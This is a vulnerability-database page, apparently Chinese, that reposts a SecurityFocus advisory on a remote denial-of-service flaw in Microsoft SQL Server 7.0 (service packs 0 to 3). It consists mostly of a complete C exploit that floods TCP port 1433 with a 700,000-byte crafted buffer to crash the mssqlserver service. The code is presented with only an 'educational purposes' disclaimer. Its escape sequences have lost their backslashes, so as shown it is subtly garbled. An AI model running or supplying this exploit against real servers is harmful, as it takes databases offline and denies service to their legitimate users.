Microsoft SQL Server 7.0 – Remote Denial of Service (2)
漏洞ID | 1054698 | 漏洞类型 | |
发布时间 | 2004-09-28 | 更新时间 | 2004-09-28 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/11265/info
Reportedly Microsoft SQL Server is affected by a remote denial of service vulnerability. This issue is due to a failure of the application to handle irregular network communications.
An attacker may leverage this issue to cause the affected server to crash, denying service to legitimate users.
/*
* Microsoft mssql 7.0 server is vulnerable to denial of service attack
* By sending a large buffer with specified data an attacker can stop the
service
* "mssqlserver" the error noticed is different according to services' pack
but the result is always
* the same one.
*
* Exception code = c0000005
*
* vulnerable: MSSQL7.0 sp0 - sp1 - sp2 - sp3
* This code is for educational purposes, I am not responsible for your acts
*
* This is the unix port of the code based on the windows one made by:
* securma massine
*
* (C) 2004 Sebastien Tricaud <[email protected]>
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define BUF_SIZE 700000
#define DEFAULT_PORT 1433
int main(int argc, char **argv)
{
int sockfd;
struct sockaddr_in target;
struct hostent *he;
char buffer[BUF_SIZE];
int i;
int retval;
for( i = 0; i < BUF_SIZE; i += 16 )
memcpy(buffer + i,
"x10x00x00x10xccxccxccxccxccxccxccxccxccxccxccxcc", 16);
if ( argc < 2 ) {
printf("Vulnerable: MSSQL 7.0 sp0 - sp1 - sp2 - sp3n");
printf("Synopsis: %s <target> [port]nn", argv[0]);
printf("This exploit is provided AS IS for testing purposes
onlyn");
return -1;
}
he = (struct hostent *)gethostbyname(argv[1]);
if ( ! he ) {
perror("Cannot get host by namenThe server is maybe down");
return -1;
}
sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if ( sockfd == -1 ) {
perror("Cannot create socket
(type=AF_INET,SOCK_STREAM,IPPROTO_TCP)n");
return -1;
}
memset(&target, 0, sizeof(struct sockaddr_in));
target.sin_family = AF_INET;
if ( argv[2] )
target.sin_port = htons(atoi(argv[2]));
else
target.sin_port = htons(DEFAULT_PORT);
target.sin_addr = *((struct in_addr *)he->h_addr);
retval = connect(sockfd, (struct sockaddr *)&target, sizeof(struct
sockaddr));
if ( retval == -1 ) {
perror("Cannot be connected to the target host (wrong port
number?)n");
return -1;
}
write(sockfd, buffer, sizeof(buffer));
printf("Data sent!n");
printf("Please wait a few seconds and check the servern");
close(sockfd);
return 0;
}
相关推荐: Microsoft Windows XP快速用户切换进程查看漏洞
Microsoft Windows XP快速用户切换进程查看漏洞 漏洞ID 1203551 漏洞类型 权限许可和访问控制 发布时间 2002-11-29 更新时间 2002-12-31 CVE编号 CVE-2002-2283 CNNVD-ID CNNVD-20…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666